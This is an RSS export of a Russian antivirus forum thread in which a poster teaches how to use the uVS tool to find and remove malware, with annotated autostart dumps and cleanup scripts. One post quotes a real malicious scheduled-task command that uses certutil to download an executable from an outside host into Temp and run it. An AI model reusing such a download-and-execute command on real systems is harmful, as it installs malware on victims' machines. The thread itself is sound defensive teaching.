Форум esetnod32.ru [тема: uVS как стать опытными пользователем этой программы.] http://forum.esetnod32.ru Новое в теме uVS как стать опытными пользователем этой программы. форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Wed, 15 Apr 2026 19:02:16 +0300 uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Можно найти угрозы проверяя записи защитника Windows - файлы в исключениях.
Сейчас часто можно увидеть такое ( как на фото )

---------
! Маскировка под блокировщик рекламы: Adblock.xpi   в  Adblock.exe
---------

10.10.2023 16:25:53, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message116648/ http://forum.esetnod32.ru/messages/forum8/topic15785/message116648/ Tue, 10 Oct 2023 16:25:53 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Пример обнаружения антивирусом и лечения системы
https://forum.esetnod32.ru/messages/forum9/topic17114/message115359/#message115359
08.02.2023 10:48:03, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message115364/ http://forum.esetnod32.ru/messages/forum8/topic15785/message115364/ Wed, 08 Feb 2023 10:48:03 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Выявление и Удаление JS/Yandex

Например Антивирус выдаёт  оповещение  - как на снимке.

Открываем uVS и через поиск находим все записи типа: CLIENTS2.GOOGLE

и удаляем.

05.01.2023 16:33:57, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message115224/ http://forum.esetnod32.ru/messages/forum8/topic15785/message115224/ Thu, 05 Jan 2023 16:33:57 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Однозначно - даже не к подозрительным, к вирусом относятся  объекты которые 5; 10; 25 раз прописаны в задачах на запуск.
" Слава" "Выдающимся"  Создателям ... ( сего чуда )
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\ACTIVATIONRULE
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Agent Activation Runtime\AGENT ACTIVATION RUNTIMESERVICES_BK796
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\AntiMalwareSericeExecutable\ANTIMALW­ARESERICEEXECUTABLESERVICES_BK656
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\ANTIMALWARESERVICEEXECUTABLE
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MICROSOFTEDGEUPD
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MicrosoftUpdateServices\MICROSOFTUPD­ATESERVICESSERVICES_BK885
                           
и т.д.
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07E64826-A11E-4A4A-853B-672E88D38A14}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07E64826-A11E-4A4A-853B-672E88D38A14}\
Task                        \Agent Activation Runtime\Agent Activation RuntimeServices_bk796
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\
Task                        \MicrosoftEdgeUpd
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1773D39D-4B62-4382-BA67-4D6A44256D80}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
и т.д.
02.01.2023 16:40:31, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message115215/ http://forum.esetnod32.ru/messages/forum8/topic15785/message115215/ Mon, 02 Jan 2023 16:40:31 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Сейчас часто используют легальные файлы для "атаки"
Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.

Или есть некий старый скрипт... который всю свою сознательную :)   жизнь был чист.  Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.
-----
Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д.
Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.
Например в каталоге с файлами 2022 года файл 2010.
Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111
Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами.
Так как файл чист - то и расширение файла - как правило стандартное.
-----
Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.
+
Возможно файл запускается через задачу, или автозапуск.
17.08.2022 18:52:13, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message114404/ http://forum.esetnod32.ru/messages/forum8/topic15785/message114404/ Wed, 17 Aug 2022 18:52:13 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
...
Просмотр активности процессов и сетевой активности.

Если есть проблемы со скоростью...

Можно замерить скорость когда система работает в безопасном режиме. Например здесь: https://yandex.ru/internet/
Загружаемся в безопасном режиме и проверяем = сравниваем.
+ Учитываем - что если включено обновление системы - то...



02.12.2021 16:35:29, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message113430/ http://forum.esetnod32.ru/messages/forum8/topic15785/message113430/ Thu, 02 Dec 2021 16:35:29 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Вредоносный сайт\ресурс который антивирус ESET определяет, как: " Обнаружена атака путем подделки записей кэша ARP "
Как это выглядит в UVS.

====code==== 
HTTPS://BESTBLUES.TECH/APP/APP.EXE
C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
=============

Программа показывает два объекта.
Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :)
Второй путь до  директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe
и не менее "интеллектуальной"  маскировкой SCHEDULED.EXE   SCHEDULED.EXE планировщик...
------------
В развёрнутом виде это:

====code==== 
Полное имя                  HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ 
               
Сохраненная информация      на момент создания образа
Статус                      
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
=============

+

====code==== 
Полное имя                  C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла                   SCHEDULED.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ 
                                                       
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле                Не удается найти указанный файл. 
Цифр. подпись               проверка не производилась
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
=============

Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д.
Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE
*Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации.
Проверка ссылки на V.T.: https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc­86511a0e4e00248a/detection

30.01.2021 11:45:25, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message111778/ http://forum.esetnod32.ru/messages/forum8/topic15785/message111778/ Sat, 30 Jan 2021 11:45:25 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Вес файла:  0 байт.
Такие файлы удалять можно ( особенно если они в автозагрузке) так, как это будет замедлять работу системы. Система выполняет ( пытается ) выполнить некое действие\операцию
с файлом у которого нет полезного функционала.
С файлом\нулёвкой  может работать программа - что-то в него записывать и\или удалять.
Если файл нужен программе для работы то программа может его воссоздать\восстановить после удаления.
Если в отношении некого файла есть сомнение его можно переименовать c: DP45977C.lfl  в DP45977C.lfl.old
---
Есть ресурсы которые показывают тип расширения и можно определить с чем мы имеем дело: open-file.ru/types/l/
( но не всегда можно получить результат :)
29.01.2021 13:48:07, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message111753/ http://forum.esetnod32.ru/messages/forum8/topic15785/message111753/ Fri, 29 Jan 2021 13:48:07 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Чем ещё "животное" может отличаться от обычной программы ?
Например типом запуска - запуск не просто прописан в Task
Может быть дополнительная запись\параметр: TaskCache
т.е. при удалении задачи - задача может сомо-восстановиться...
Для простой программы это не нужно...
------
Пример:
Полное имя                  C:\USERS\NIKITA\APPDATA\ROAMING\MICROSOFT\ADMODNETW4B8\ADNEKMOD8B4.DLL
Имя файла                   ADNEKMOD8B4.DLL
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
File_Id                     5FDC35A8C000
Linker                      11.0
Размер                      12800 байт
Создан                      18.12.2020 в 18:37:33
Изменен                     18.12.2020 в 18:37:33
                           
TimeStamp                   18.12.2020 в 04:52:56
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              +
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Оригинальное имя            AdNetwork.dll
Версия файла                1.0.0.0
Описание                    AdNetwork
Производитель              
Комментарий                
                           
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\RUNDLL32.EXE
CmdLine                     C:\USERS\NIKITA\APPDATA\ROAMING\MICROSOFT\ADMODNETW4B8\ADNEKMO­D8B4.DLL,AMIGOUPDATER
SHA1                        0CBA96ADD40FC610017EF4A2BA8F4220694A1018
MD5                         B5BF285378916D5119D87C08917FE872
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\ZAMIGOBROWSERUPDATE
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C95E75C3-E3E5-4062-89C5-D661FD154BA4}\Actions
Actions                     "rundll32.exe" C:\Users\Nikita\AppData\Roaming\Microsoft\AdModNetW4b8\adnekmo­d8b4.dll,AmigoUpdater
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C95E75C3-E3E5-4062-89C5-D661FD154BA4}\
---------
Что здесь подозрительно: Оригинальное имя отличается; Имя задачи отличается, задано с ошибкой\небрежно; небольшой размер файла, левый путь до файла, автозапуск, отсутствие ЭЦПодписи; Работа с системным RUNDLL32.EXE, не просто Task а TaskCache, Это новый недавно созданный файл.



...
29.12.2020 21:00:15, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message111503/ http://forum.esetnod32.ru/messages/forum8/topic15785/message111503/ Tue, 29 Dec 2020 21:00:15 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
В uVS  можно работать с реестром неактивной системы.

Для этого нужен или Live CD или вторая установленная система.

Запускаем uVS > выбираем нужную нам систему ( папку\каталог )  Windows
Программа найдёт реестр: ( например по пути: C:\Windows\System32\config )

Находим нужный нам файл\объект > открываем: Информация
Находим строку с нужной записью > хлопаем мышью 2х > на выбранном пункте откроется реестр.
пример на фото.
И здесь можно внести нужные нам изменения.


14.12.2020 23:42:52, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message111336/ http://forum.esetnod32.ru/messages/forum8/topic15785/message111336/ Mon, 14 Dec 2020 23:42:52 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Ответ на вопрос из темы:  файлы jpg, png, txt, gif, webp, dll, ini , Возможные угрозы


1) Есть файлы с двойным расширением:

Если _включено в ( Параметры папок ): Скрывать расширения для зарегистрированных типов файлов то пользователь будет видеть: picture.jpg
Хотя реально это будет: picture.jpg.exe

2) Исполняемый файл может содержать фрагмент изображения. ( ресурс )
т.е. маскировка под файл изображения, видео или офиса.

3) Изображение может включать исполняемый код ( эксплуатируется  уязвимость на старых или не обновлённых системах )
Как найти:
а) Сам файл изображения не должен включать осмысленный код\текст.
т.е. можно открыть файл .jpg в текстовом редакторе и посмотреть.

б) Проверить в uVS
Файл > Добавить в список > Все исполняемые файлы в каталоге ( или указываем диск )
Получите список _всех _исполняемых файлов каталога или диска. (.exe; dll и т.д ) ( вне зависимости от видимого расширения файла )

в) Проверить файл на https://www.virustotal.com/gui/home/upload
И после анализа файла посмотреть все вкладки - что какие компоненты входят в состав файла.
Сравнить с обычным файлом изображения.

г) Переименовать файл в *****.zip и открыть на просмотр в архиваторе.
Если файл исполняемый то архиватор такой файл откроет ( как правило ) ... если не исполняемый выдаст ошибку.

д) Работаем с программой: Resource Hacker  ( можно посмотреть ресурсы файла\программы - есть они, нет и какие это ресурсы )
06.09.2020 17:21:14, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message109648/ http://forum.esetnod32.ru/messages/forum8/topic15785/message109648/ Sun, 06 Sep 2020 17:21:14 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Какие файлы можно удалять не боясь угробить систему ?
Можно удалять файлы с расширениями:
.BAT

Пример:
OK.BAT
VK.BAT
BROWSER.BAT
BROWSER.EXE.BAT

.URL

BROWSER.URL
FIREFOX.URL
CHROME.URL

HTTP:

HTTP://
HTTP:\\
0HTTP://
0HTTP:\\
EXPLORER.EXE HTTP://
EXPLORER.EXE HTTP:\\
OPERA.EXE HTTP://
OPERA.EXE HTTP:\\

.XML

ASK-SEARCH.XML
CONDUIT-SEARCH.XML

.TMP
.LNK

--------------------------------------------------------
Какие пути чаще всего используются:
\APPDATA\LOCAL\
\APPDATA\ROAMING\
\APPLICATION DATA\
\PROGRAMDATA\

\PROGRAMS\STARTUP\
\START MENU\PROGRAMS\STARTUP\
\TEMP\

\TEMP\ - каталоги "TEMP" содержать временные файлы ( как правило эти временные файлы используются 1-2 раза - значит их можно удалять )
\PROGRAMS\STARTUP\ - каталоги вообще не должны ничего содержать ( если вы сами не добавили программу\ярлык в запуск )
27.05.2020 09:19:07, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message109116/ http://forum.esetnod32.ru/messages/forum8/topic15785/message109116/ Wed, 27 May 2020 09:19:07 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Когда вирус сам себя обнаруживает.
Вирусы создают но бывает создают криво с ошибками и пользователь видит сообщение об ошибке.
Как мы ранее выяснили часто вирусы пытаются замаскировать под системные файлы, или хотя бы изобразить что-то похожее на известный объект.
Запускаем uVS находим по поиску ( по имени файла, или пути )
( если не можем найти по поиску помним, что имя может содержать как кириллические так и латинские символы ( в данном случае это могут быть: Т; А ; H ; О )
Проверяем файл по virustotal.com  открываем Инфо. файла и смотрим:
Обращаем внимание на время создания файла; имя; атрибуты; смотрим тип файла, в автозапуске он или нет и на способ\тип запуска.

Полное имя                  C:\PROGRAMDATA\REALTEKHD\TASKHOST.EXE
Имя файла                   TASKHOST.EXE
Тек. статус                  ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2020-05-21

Malwarebytes                RiskWare.BitCoinMiner
ESET-NOD32                  Win32/CoinMiner.BGU


Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
File_Id                     5EB17B071B9000
Linker                      12.0
Размер                      1767424 байт
Создан                      05.05.2020 в 16:50:35
Изменен                     05.05.2020 в 17:41:40
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  
                           
TimeStamp                   05.05.2020 в 14:41:11
EntryPoint                  +
OS Version                  0.2
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Оригинальное имя            MicrosoftHost.exe
Версия файла                2.14.0
Описание                    NT Kernel & System
Copyright                   Microsoft Corporation
Производитель               Microsoft Corporation
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
Путь до файла               Не_типичен для этого файла [имя этого файла есть в известных]
                           
Доп. информация             на момент обновления списка
SHA1                        AC6B619ACECE942F27D75E1E0EA46B94BC9B91A9
MD5                         DE88D7EC667DEA756D236E9053D7EEB9
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Wininet\REALTEKHDC­ONTROL
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Wininet\REALTEKHDS­TARTUP
--------------
Здесь использовано известное имя и нетипичный путь до файла, файл скрытый, вердикт на V.T. многократно прописан в задачах.
--------------
Принцип здесь такой: + + + +
каждое отклонение добавляет + к файлу и чем больше этих плюсов тем подозрительнее объект ( ведь не всегда есть интернет и возможность проверить файл антивирусами )
---------------
Нашли одну угрозу ?
Ищите дальше - их может быть и две и три не всё же надеяться на чужие ошибки.

21.05.2020 22:58:38, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message109079/ http://forum.esetnod32.ru/messages/forum8/topic15785/message109079/ Thu, 21 May 2020 22:58:38 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
uVS может работать с неактивной системой.
Для чего ?
В случае когда система не загружается, когда тормозит и невозможно нормально работать, если есть подозрение на руткит, система заблокирована вымогателем, чтобы не допустить дальнего распространения вируса - блокировать его активность, его деструктивные действия.

так, как систем может быть установлено несколько:
1) При запуске выбираем: Выбрать каталог Windows ( выбрана активная система )
* Активная система - это та система в которой вы сейчас работаете ( например система загрузочного диска Live CD ( WinPE )

2) Выбираем нужную нам Windows  например: C:\Windows  или  F:\Windows
т.е. нам нужно указать программе на нужный каталог.

Посмотреть инструкцию. ( здесь показано как создавать образ автозапуска т.е. сбор информации по системе )
http://forum.esetnod32.ru/forum6/topic2102/
http://forum.esetnod32.ru/forum9/topic683/

3) Запускаем под текущим пользователем.

Имена дисков C:\  D:\ E:\  и т.д.  могут отображаться не так как вы привыкли.
Чтобы это компенсировать в  программе есть транслятор имён дисков.
Обязательно обращайте внимание на это... Если систем несколько вы можете подключить не ту систему которую нужно - или продолжать работать с активной системой.

---------------------
Если антивирус сигнализирует об обнаружении угрозы в одно и тоже время ?
Если запуск\обнаружение - угрозы происходит в одно и то же время - значит работает системный планировщик заданий.
Так планировщик может работать с браузером и т.д.
24.03.2020 19:16:43, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108684/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108684/ Tue, 24 Mar 2020 19:16:43 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Часто в работу системы вмешиваются хвосты...
Нет, это не те хвосты к которым мы привыкли - это хвосты антивирусов.
Был у человека антивирус - антивирус удалили, а хвосты то остались...
Хвост - это служба, служба караульная - держать и не пущать !

Как выявить ?
Как правило все компоненты антивирусов подписаны производителем ( т.е. имеют свою ЭЦП )

AVAST Software a.s.
AVG Technologies
Kaspersky Lab
и т.д.

Жмём F6 - идёт проверка ЭЦП
Выбираем категорию: Весь Автозапуск или категорию ВСЕ
Выбираем колонку: Производитель.
Для того  чтобы упростить себе поиск выбираем чек бокс: [v] известные ( скрыть известные )
Чтобы система не тормозила - хвосты удаляем.
А ведь есть ещё и левые антивирусы.
У Компонентов антивирусов как правило есть самозащита поэтому нужно удалять, или в безопасном режиме, или с Live CD ( работая с неактивной системой )
Бывает, что люди устанавливают по 5-ть антивирусов и здесь уже не до хвостов. ( тогда удаляем штатно + спец. программой )
Практически у всех разработчиков-антивирусов есть специальные программы  для удаления их продуктов.
Поэтому лучше найти\определить следы\компоненты какого антивируса есть в системе и применить спец. утилиту для удаления.
Антивирусов очень много - хорошо если известно какой антивирус был установлен.

У Avast это Avast Clear (Uninstall Utility)
https://www.comss.ru/page.php?id=383

У AVG  - AVG Clear
http://www.comss.ru/page.php?id=1301

Kaspersky kav-removal
http://www.comss.ru/download/kav+removal+tool.html

и т.д.
Список производителей можно посмотреть на том же V.T.

24.03.2020 18:39:29, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108683/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108683/ Tue, 24 Mar 2020 18:39:29 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Категория WMI
Как выявить подозрительный объект.
Как правило в данной категории есть 1-2 записи.
Если таких записей больше - это уже подозрительно.
Инструментом WMI  мало кто пользуется - в основном системные администраторы в компаниях и то редко - редко...
Можно ли снести все записи не разбираясь ?
Да, можно - видимого влияния на работу системы это не оказывает.

При удалении вируса -
СМОТРИТЕ ЧТОБЫ НЕ БЫЛО ССЫЛОК НА СИСТЕМНЫЕ ФАЙЛЫ. ( если, есть такая ссылка - то в программе предусмотрена безосная команда: ( Удалить WMI Event )

Однако если разобраться...
Открываем Инфо.
Это вирус, если в тексте есть записи: .VBS ; VBScript ; ****.exe ; браузер.exe
Внутренние ссылки с указанием на любой  исполняемый файл. ( в том числе на любой системный )
Любая запись с внешним адресом: http://***  HTTPS://*** и т.д.
Лучше всего сохранить текст в блокнот - так будет удобно его просматривать.
Можно запомнить - какая запись есть в норме. И удалять любую новую\неизвестную запись.
Если запись успела засветиться - тогда имеет смысл проверить полученный вами текстовый файл на V.T
24.03.2020 18:02:15, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108682/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108682/ Tue, 24 Mar 2020 18:02:15 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Спасибо за информацию
23.03.2020 23:27:55, Катерина Петрова.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108681/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108681/ Mon, 23 Mar 2020 23:27:55 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
При анализе системы ( хорошо вам знакомой системы )
Если в списке активных процессоров видим процессы относящиеся к оборудованию, антивирусом, браузерам и т.д. которые вы не устанавливали... а они есть ...
12.03.2020 15:09:03, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108566/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108566/ Thu, 12 Mar 2020 15:09:03 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Выполнение скрипта с параллельным созданием нового образа автозапуска.
*Добавляем команду: crimg

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

addsgn A7679BF0AA0244834FD4C601898A1261848AFCF689AA7BF1A0C3C5BC5055­9D14704194DE5BBD625CD7E0C09F75C4C32EF4CA383113DA3BE4AC965B2F­C706AB7E 8  Fox .Vir1-2.

adddir %SystemRoot%\Zebra.exe
chklst
delvir
deltmp
delnfr
crimg
czoo
restart

----------------------------------
При очистке данных в браузере всегда закрывайте браузеры...  Если не закрыть, есть риск, что браузер придётся ремонтировать....

----------------------------------
uVS поддерживает работу с CMD - с командной строкой.


;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
EXEC cmd /c"netsh winsock reset catalog"
restart

EXEC cmd  - вызов\обращение.
netsh winsock reset catalog - сброс настроек и восстановление первоначальной конфигурации LSP Winsock

В случае проблем с сетью...

-----------------------------------
Пример удаления объекта через CMD:  ( ну а вдруг понадобиться ! )

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1

ZOO C:\PROGRAMDATA\Zebra.exe
EXEC cmd /c"DEL C:\PROGRAMDATA\Zebra.exe"
restart

DeL он и в Африке DEL

---------------------------------------
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
----------------------------------------

* При удалении Активных/Внедряемых  .Dll - применяются команды вида: delref + del

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1

delref %SystemRoot%\ZUDVA.Dll
del %SystemRoot%\ZUDVA.Dll
restart

Если файл не даёт себя удалить - uVS отложит удаление и удалит при старте PC
Не стоит удалять его в лоб командой: delall  ( но здесь всё индивидуально - раз на раз не приходиться - но не стоит рисковать )
--------------------------------------------------
или даже так:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1

sreg
delref %SystemRoot%\ZUDVA.Dll
areg

Альтернатива: Удаление в безопасном режиме.
---------------------
Вторым скриптом - после перегрузки можно добить тушку\файл, что остался  на диске.
12.03.2020 15:01:19, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108565/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108565/ Thu, 12 Mar 2020 15:01:19 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Работа с каталогом.

Рассмотрим вариант зачистки каталога с применением сигнатуры.
Есть каталог: C:\WINDOWS\Zebra  ( %SystemRoot%\Zebra )
Два файла, этого каталога... по полученным данным прописаны в автозагрузке.
Это: Fox 1.exe и  Fox 2.exe*
*Сигнатуры для файлов Fox 1.exe и  Fox 2.exe совпадают.
Мы предполагаем, что каталог \ Zebra \ содержит и другие объекты: Fox 3.exe & Fox 4.exe
Гипотеза: файлы - Fox 3.exe & Fox 4.exe, имеют схожею сигнатуру с Fox 1.exe и  Fox 2.exe.
Значит, при применении данной сигнатуры, мы имеем возможность удалить все файлы попавшие под её определение !  

а) Добавляем сигнатуру Fox 1.exe &  Fox 2.exe  ( Fox .Vir1-2.)
б) Добавляем каталог проверки,  это команда: "adddir"*
*т.е. Все исполняемые файлы каталога будут добавлены в список проверки.
г) chklst & delvir  Проверка списка и Удаление файлов попавших под определение сигнатуры.**
**Следует учитывать, что проверка/зачистка происходит с применением всех имеющихся в наличие, в файле/баз "sgnz" сигнатур.
Сигнатур, полученных и сохранённых, например при выполнении предыдущих скриптов!

Последовательность команд:
addsgn
addsgn - добавление сигнатур\ы
adddir
adddir - добавление файлов каталога

